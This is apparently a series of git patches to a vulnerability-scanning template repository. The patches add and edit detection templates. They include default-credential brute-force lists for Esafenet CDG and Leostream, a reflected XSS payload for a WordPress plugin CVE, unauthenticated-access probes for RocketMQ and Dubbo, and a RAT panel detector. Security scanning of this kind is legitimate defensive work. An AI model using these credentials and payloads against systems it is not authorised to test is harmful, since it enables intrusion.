insertions(+) create mode 100644 http/default-logins/esafenet-cdg-default-login.yaml diff --git a/http/default-logins/esafenet-cdg-default-login.yaml b/http/default-logins/esafenet-cdg-default-login.yaml new file mode 100644 index 0000000000..9a465f83b4 --- /dev/null +++ b/http/default-logins/esafenet-cdg-default-login.yaml @@ -0,0 +1,52 @@ +id: esafenet-cdg-default-login + +info: + name: Esafenet CDG - Default Login + author: chesterblue + severity: high + description: | + esafenet electronic document security management system (abbreviation: CDG) is an electronic document security encryption software.CDG contains a default login vulnerability. + metadata: + verified: "true" + fofa-query: "esafenet" + tags: esafenet,cdg,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/CDGServer3/SystemConfig" + headers: + content-type: application/x-www-form-urlencoded + body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}" + + attack: clusterbomb + payloads: + username: + - "systemadmin" + - "configadmin" + - "secadmin" + - "docadmin" + password: + - "Est@Spc820" + - "12345678" + - "123456" + - "Est@Spc2018" + - "Est@Spc2019" + - "Est@Spc2020" + - "Est@Spc2021" + - "Est@Spc2022" + + matchers-condition: and + matchers: + - type: word + words: + - "est.connection.url" + + - type: regex + regex: + - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}" + part: body + + - type: status + status: + - 200 \ No newline at end of file From 7bb771ef41fe4e8303d96fa73e656580eeadeabb Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 19:53:52 +0530 Subject: [PATCH 426/609] lint -fix --- http/default-logins/esafenet-cdg-default-login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/default-logins/esafenet-cdg-default-login.yaml b/http/default-logins/esafenet-cdg-default-login.yaml index 9a465f83b4..ba3344ff72 100644 --- a/http/default-logins/esafenet-cdg-default-login.yaml +++ b/http/default-logins/esafenet-cdg-default-login.yaml @@ -5,7 +5,7 @@ info: author: chesterblue severity: high description: | - esafenet electronic document security management system (abbreviation: CDG) is an electronic document security encryption software.CDG contains a default login vulnerability. + Esafenet electronic document security management system default credentials were discovered. metadata: verified: "true" fofa-query: "esafenet" @@ -43,10 +43,10 @@ requests: - "est.connection.url" - type: regex - regex: + regex: - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}" part: body - type: status status: - - 200 \ No newline at end of file + - 200 From ed21cdab7669bce526e92bbbdd4fa5ad9971240b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 6 Jul 2023 14:56:12 +0000 Subject: [PATCH 427/609] Auto Generated New Template Addition List [Thu Jul 6 14:56:11 UTC 2023] :robot: --- .new-additions | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/.new-additions b/.new-additions index ac6206ce35..69288206dd 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,12 @@ +file/keys/adafruit-key.yaml +file/keys/adobe/adobe-client.yaml +file/keys/airtable-key.yaml +file/keys/algolia-key.yaml +file/keys/alibaba/alibaba-key-id.yaml +file/keys/alibaba/alibaba-secret-id.yaml +file/keys/asana/asana-clientid.yaml +file/keys/asana/asana-clientsecret.yaml +file/keys/atlassian/atlassian-api-token.yaml file/webshell/asp-webshell.yaml file/webshell/jsp-webshell.yaml file/webshell/php-webshell.yaml @@ -14,3 +23,12 @@ http/exposed-panels/shell-box.yaml http/exposed-panels/untangle-admin-login.yaml http/exposed-panels/uptime-kuma-panel.yaml http/exposures/configs/collibra-properties.yaml +http/exposures/tokens/adafruit/adafruit-api-key.yaml +http/exposures/tokens/adobe/adobe-client-id.yaml +http/exposures/tokens/airtable/airtable-api-key.yaml +http/exposures/tokens/algolia/algolia-api-key.yaml +http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml +http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml +http/exposures/tokens/asana/asana-client-id.yaml +http/exposures/tokens/asana/asana-client-secret.yaml +http/exposures/tokens/atlassian-token.yaml From 45eaa91fa068ec0917eae3cedbd3c5e6022c88b1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 6 Jul 2023 14:56:26 +0000 Subject: [PATCH 428/609] Auto Generated Templates Checksum [Thu Jul 6 14:56:26 UTC 2023] :robot: --- templates-checksum.txt | 22 ++++++++++++++++++++-- 1 file changed, 20 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4824eb6601..7dd5092fd7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -67,15 +67,24 @@ file/bash/bash-scanner.yaml:34c81ff693760add86b161184ca4ef55535d4ba6 file/electron/electron-version-detect.yaml:48a02ecd612fea69e5463adf12090cac7827cf5f file/electron/node-integration-enabled.yaml:3de6b8cc228cb5cb4d806317982aeebb49d0c4b7 file/js/js-analyse.yaml:a6147fffd63f593695966ef2bc8c188ecc2be9e8 -file/keys/adobe-secret.yaml:356ca5c276c138bdf283fb5ad37c92c334039f9e +file/keys/adafruit-key.yaml:a66ee5e3ad5b40308b9206b25d117e373abff060 +file/keys/adobe/adobe-client.yaml:57ca527417d5eed1d8f7d9f62678fbd84258002e +file/keys/adobe/adobe-secret.yaml:356ca5c276c138bdf283fb5ad37c92c334039f9e file/keys/age/age-identity-secret-key.yaml:dfd8a55c73a302cc09e4fd808b0f9e8d95e7a780 file/keys/age/age-recipient-public-key.yaml:a6fe20a97710ae2ee48df1d3607b0b3e2f4c55fa +file/keys/airtable-key.yaml:f9cb73e132fe2efe7f69b00438a3d3091457dbc8 +file/keys/algolia-key.yaml:4366751e05ccb825f7a370c56ead5b9168969eb2 +file/keys/alibaba/alibaba-key-id.yaml:259009a14147f427f4e985361c6a6e2e241ff88f +file/keys/alibaba/alibaba-secret-id.yaml:45c004e50f2a324edd4d4d7ec8e2e63352c94109 file/keys/amazon/amazon-account-id.yaml:0264a3557df595b0a049310c2fff5b487135d2aa file/keys/amazon/amazon-mws-auth-token.yaml:c2162a91395c784d9a71e2b853a25e870f5f29a6 file/keys/amazon/amazon-session-token.yaml:465d5705c9c154d4efff90549ee9dc68caedb5d4 file/keys/amazon/amazon-sns-token.yaml:5b36aa8557573cf1718dbac9d85bc67730eb1a85 file/keys/amazon/aws-access-id.yaml:5eb3160b1e7a74ea14276003e0a642b6edb42cd6 file/keys/amazon/aws-cognito.yaml:f4e59d0d3254fb5474f409f0b11c1c1d07fd78f4 +file/keys/asana/asana-clientid.yaml:a6533858cd31d736c5853bb67c122e6deee46a10 +file/keys/asana/asana-clientsecret.yaml:e0062b96a325d24c7e6187e9470e396a86928245 +file/keys/atlassian/atlassian-api-token.yaml:385bbf18eaece6067bb9c500271e1d378096bdad file/keys/azure/azure-connection-string.yaml:d58bf3c6083043544a3274141e58741eab46bc5f file/keys/branch-key.yaml:e48b970b6fb7198eb32773851fe531eb766e873b file/keys/cloudinary.yaml:956631a29959c15ea1fb99bd6334dcb1f27494b1 @@ -3656,9 +3665,15 @@ http/exposures/logs/wp-app-log.yaml:403b825fbc57bca5d273e2c0b98cc2911b58a4eb http/exposures/logs/ws-ftp-log.yaml:464817255594194585169872fb8d67e646ac9dd1 http/exposures/logs/yii-error-page.yaml:43b710dceaab18cb5a478813c82869c844fd7a03 http/exposures/logs/zm-system-log-detect.yaml:8cacf6ab0c02570efc6af8f4200c9e5333f769f3 +http/exposures/tokens/adafruit/adafruit-api-key.yaml:4cd832cef2ce702adb81b47d5fdadb9239812bf4 +http/exposures/tokens/adobe/adobe-client-id.yaml:20942636512225f69b9ca836f8221f67c3af74b1 http/exposures/tokens/adobe/adobe-oauth-secret.yaml:0e8c2085c91d97e3ca4201ffcb813f8eced6ad00 http/exposures/tokens/age/age-public-key.yaml:50ce3214c7641880e7250fce4e13865905cfe354 http/exposures/tokens/age/age-secret-key.yaml:67bd669aa717f4a4f436a82ef65f94ef59b44eef +http/exposures/tokens/airtable/airtable-api-key.yaml:8ad9cc7a699bc1337d3f63bd1abc61428576ae5b +http/exposures/tokens/algolia/algolia-api-key.yaml:27dab7731d86647eabde84dfd91323667ddc887e +http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml:e9cd8c03d796ed006affe2b914d72f242c05c04b +http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml:36b0f54b1f2ef763159cd2148b610b9afe1a791d http/exposures/tokens/amazon/amazon-mws-auth-token.yaml:fd102ecb9568eb7f35ac700379689e38c556462e http/exposures/tokens/amazon/amazon-sns-topic.yaml:7594a7fcb1bb8fbb96d7eff0253f2d8fc3224af0 http/exposures/tokens/amazon/aws-access-key-value.yaml:640c6c7825c6ed936c0bf0d237d9dd831049a4fd @@ -3668,6 +3683,9 @@ http/exposures/tokens/amazon/aws-api-key.yaml:96b46e1ddb221680c9391ade5046843ca3 http/exposures/tokens/amazon/aws-session-token.yaml:350024b94436599a5ddfb221bad8b8dd8a0c27f9 http/exposures/tokens/artifactory/artifactory-api-password.yaml:49f25553cd2fdf079b0d15538d97b5a0e1da2af1 http/exposures/tokens/artifactory/artifactory-api-token.yaml:fd5c54e9de8f3c604d7049c8ada16ca51b3b5901 +http/exposures/tokens/asana/asana-client-id.yaml:4efcc09992dc9232b354d66e080825c50f96788e +http/exposures/tokens/asana/asana-client-secret.yaml:7119c2a8a97896580d3ad1e5289e1bb65e8e9b3e +http/exposures/tokens/atlassian-token.yaml:e136155d23c0d664f773b662594329b454bbdeb2 http/exposures/tokens/azure/azure-apim-secretkey.yaml:5408ee0ab817cb9085955684e452a1ac7eb641a0 http/exposures/tokens/azure/azure-connection.yaml:db002ce072abc90fb25983fc89bf6c2121619304 http/exposures/tokens/bitly/bitly-secret-key.yaml:c2dde65c215d3f9a5ce240f1c2b048d804da35f5 @@ -6501,7 +6519,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:fb1e27d757d0f4c46a98649af2db40f09e228737 +templates-checksum.txt:6aec6bf9d0e32f5e4a3a98c33524e2fd6d8ad9b0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 8871b8acd136bf4a2a866fd13deeb64e01a4f244 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 22:22:31 +0530 Subject: [PATCH 429/609] protocol & metadata -update --- network/apache-rocketmq-broker-unauth.yaml | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/network/apache-rocketmq-broker-unauth.yaml b/network/apache-rocketmq-broker-unauth.yaml index a0dcbd1f91..da8b0d2a59 100644 --- a/network/apache-rocketmq-broker-unauth.yaml +++ b/network/apache-rocketmq-broker-unauth.yaml @@ -3,12 +3,18 @@ id: apache-rocketmq-broker-unauth info: name: Apache Rocketmq Broker - Unauthenticated Access author: j4vaovo - severity: critical - description: Apache Rocketmq Unauthenticated Access. + severity: high + description: | + Apache Rocketmq Unauthenticated Access were detected. reference: + - https://rocketmq.apache.org/docs/bestPractice/03access + metadata: + verified: true + fofa-query: protocol="rocketmq" + shodan-query: title:"RocketMQ" tags: network,rocketmq,broker,apache,unauth -network: +tcp: - inputs: - data: "000000c9000000b17b22636f6465223a32352c226578744669656c6473223a7b224163636573734b6579223a22726f636b65746d7132222c225369676e6174757265223a222b7a6452645575617a6953516b4855557164727477673146386a6b3d227d2c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3433337d746573745f6b65793d746573745f76616c75650a0a" type: hex From 0d4c01fc20cf967f048d7579c4e8010586c1d244 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 22:23:13 +0530 Subject: [PATCH 430/609] Rename network/apache-rocketmq-broker-unauth.yaml to network/misconfig/apache-rocketmq-broker-unauth.yaml --- network/{ => misconfig}/apache-rocketmq-broker-unauth.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename network/{ => misconfig}/apache-rocketmq-broker-unauth.yaml (100%) diff --git a/network/apache-rocketmq-broker-unauth.yaml b/network/misconfig/apache-rocketmq-broker-unauth.yaml similarity index 100% rename from network/apache-rocketmq-broker-unauth.yaml rename to network/misconfig/apache-rocketmq-broker-unauth.yaml From 8a705ef08d25c2fa89a0d8a9172d6728e7d99d12 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 6 Jul 2023 22:49:11 +0530 Subject: [PATCH 431/609] updated req & info --- http/cves/2016/CVE-2016-10973.yaml | 23 +++++++---------------- 1 file changed, 7 insertions(+), 16 deletions(-) diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index c705e21274..eef70daddc 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -1,7 +1,7 @@ id: CVE-2016-10973 info: - name: brafton WordPress Plugin <=3.4.7 - Reflected XSS + name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting author: Harsh severity: medium description: | @@ -15,23 +15,14 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 metadata: - verified: true - tags: cve,cve2016,xss,brafton,reflected,auth + max-request: 1 + tags: cve,cve2016,wordpress,wp,wp-plugin,xss,brafton -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))" - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83)) HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true matchers: - type: dsl dsl: From 3e713713e725e138b4145d70823e94df0bd8125c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 6 Jul 2023 22:57:19 +0530 Subject: [PATCH 432/609] updated info & matcher --- misconfiguration/proxy/open-proxy-external.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/misconfiguration/proxy/open-proxy-external.yaml b/misconfiguration/proxy/open-proxy-external.yaml index 3bb88e3c1f..cbb3c6b36b 100644 --- a/misconfiguration/proxy/open-proxy-external.yaml +++ b/misconfiguration/proxy/open-proxy-external.yaml @@ -3,19 +3,19 @@ id: open-proxy-external info: name: Open Proxy To External Network author: gtrrnr - severity: high + severity: medium description: The host is configured as a proxy which allows access to other hosts on the external network. reference: - https://en.wikipedia.org/wiki/Open_proxy - https://www.acunetix.com/vulnerabilities/web/apache-configured-to-run-as-proxy/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: exposure,config,proxy,misconfig + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-441 metadata: max-request: 2 + tags: exposure,config,proxy,misconfig http: - raw: @@ -31,6 +31,6 @@ http: matchers: - type: dsl dsl: - - contains(body_1, "www.iana.org") + - contains(body_1, "www.iana.org") || contains(body_1, "Example Domain") - contains(header_2, "X-Interactsh-Version") condition: or From b12d7501f3471503941c88006bf1d78aadaa05e9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 23:14:03 +0530 Subject: [PATCH 433/609] minor -update --- network/apache-dubbo-unauth.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/network/apache-dubbo-unauth.yaml b/network/apache-dubbo-unauth.yaml index 2246661ade..d5a93d19ec 100644 --- a/network/apache-dubbo-unauth.yaml +++ b/network/apache-dubbo-unauth.yaml @@ -4,11 +4,16 @@ info: name: Apache Dubbo - Unauthenticated Access author: j4vaovo severity: high - description: Apache Dubbo Unauthenticated Access. + description: | + Apache Dubbo Unauthenticated Access were detected. reference: - tags: network,dubbo,apache,unauth + - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/ + metadata: + verified: true + fofa-query: "apache dubbo" + tags: network,dubbo,apache,unauth,misconfig -network: +tcp: - inputs: - data: "68656c700d0a" type: hex From 95a818f0c6cc5b1f9174a731c737a615da7332b3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 23:14:42 +0530 Subject: [PATCH 434/609] Rename network/apache-dubbo-unauth.yaml to network/misconfig/apache-dubbo-unauth.yaml --- network/{ => misconfig}/apache-dubbo-unauth.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename network/{ => misconfig}/apache-dubbo-unauth.yaml (100%) diff --git a/network/apache-dubbo-unauth.yaml b/network/misconfig/apache-dubbo-unauth.yaml similarity index 100% rename from network/apache-dubbo-unauth.yaml rename to network/misconfig/apache-dubbo-unauth.yaml From 6b5c77915e223eaf9df88e7e309873264b9e1b13 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 23:30:49 +0530 Subject: [PATCH 435/609] Hookbot Rat Panel --- http/exposed-panels/c2/hookbot-rat.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 http/exposed-panels/c2/hookbot-rat.yaml diff --git a/http/exposed-panels/c2/hookbot-rat.yaml b/http/exposed-panels/c2/hookbot-rat.yaml new file mode 100644 index 0000000000..f7bfcca049 --- /dev/null +++ b/http/exposed-panels/c2/hookbot-rat.yaml @@ -0,0 +1,23 @@ +id: hookbot-rat + +info: + name: Hookbot Rat Panel - Detect + author: pussycat0x + severity: info + description: | + Hookbot panel were detected. + metadata: + shodan-query: title:"hookbot" + verified: "true" + tags: tech,rat,hookbot,c2,panel + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - "status_code == 200 && contains(body, 'HOOKBOT')" + condition: and \ No newline at end of file From ab9a2c2eaed92c75bdb4275f796bb0765c73dee3 Mon Sep 17 00:00:00 2001 From: Guillaume Granjus Date: Thu, 6 Jul 2023 21:35:41 +0200 Subject: [PATCH 436/609] Fix when namespace default doesn't exists --- .../misconfiguration}/unauth-temporal-web-ui.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename {headless => http/misconfiguration}/unauth-temporal-web-ui.yaml (83%) diff --git a/headless/unauth-temporal-web-ui.yaml b/http/misconfiguration/unauth-temporal-web-ui.yaml similarity index 83% rename from headless/unauth-temporal-web-ui.yaml rename to http/misconfiguration/unauth-temporal-web-ui.yaml index 6cb32b063f..25b3851d7a 100644 --- a/headless/unauth-temporal-web-ui.yaml +++ b/http/misconfiguration/unauth-temporal-web-ui.yaml @@ -15,7 +15,7 @@ info: metadata: verified: 'true' shodan-query: http.favicon.hash:557327884 - tags: temporal,unauth,headless + tags: temporal,unauth http: - method: GET @@ -28,5 +28,8 @@ http: - type: dsl dsl: - "status_code_1 == 200 && (\"44c856843ce2631b1d6968ac11fa9ec4\" == md5(body_1))" + - type: dsl + dsl: - "contains(body_2, 'nextPageToken') && status_code_2 == 200" - condition: and + - "contains(body_2, 'Namespace default is not found.') && status_code_2 == 404" + condition: or \ No newline at end of file From d0427dbd776307ce33d267e03890d0af6ae8b96f Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Thu, 6 Jul 2023 20:56:15 +0000 Subject: [PATCH 437/609] Create leostream-default-login.yaml --- .../leostream/leostream-default-login.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/default-logins/leostream/leostream-default-login.yaml diff --git a/http/default-logins/leostream/leostream-default-login.yaml b/http/default-logins/leostream/leostream-default-login.yaml new file mode 100644 index 0000000000..44ef9e6936 --- /dev/null +++ b/http/default-logins/leostream/leostream-default-login.yaml @@ -0,0 +1,40 @@ +id: leostream-default-login + +info: + name: Leostream Default Login + author: bhutch + severity: high + description: Leostream default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: leostream,default-login + metadata: + shodan-query: http.title:"Leostream" + max-request: 1 + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + + login_type=0&user={{username}}&password={{password}}&submit=SIGN+IN + + payloads: + username: + - admin + password: + - leo + attack: pitchfork + + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + words: + - "Set-Cookie: lld=%21" + part: header From 351bae6f8b5f51b45474e943ffecea9cd3172969 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 04:02:10 +0000 Subject: [PATCH 438/609] Auto WordPress Plugins Update [Fri Jul 7 04:02:10 UTC 2023] :robot: --- helpers/wordpress/plugins/all-in-one-seo-pack.txt | 2 +- helpers/wordpress/plugins/breeze.txt | 2 +- .../wordpress/plugins/essential-addons-for-elementor-lite.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- helpers/wordpress/plugins/ninja-forms.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/really-simple-ssl.txt | 2 +- helpers/wordpress/plugins/updraftplus.txt | 2 +- helpers/wordpress/plugins/wp-optimize.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - 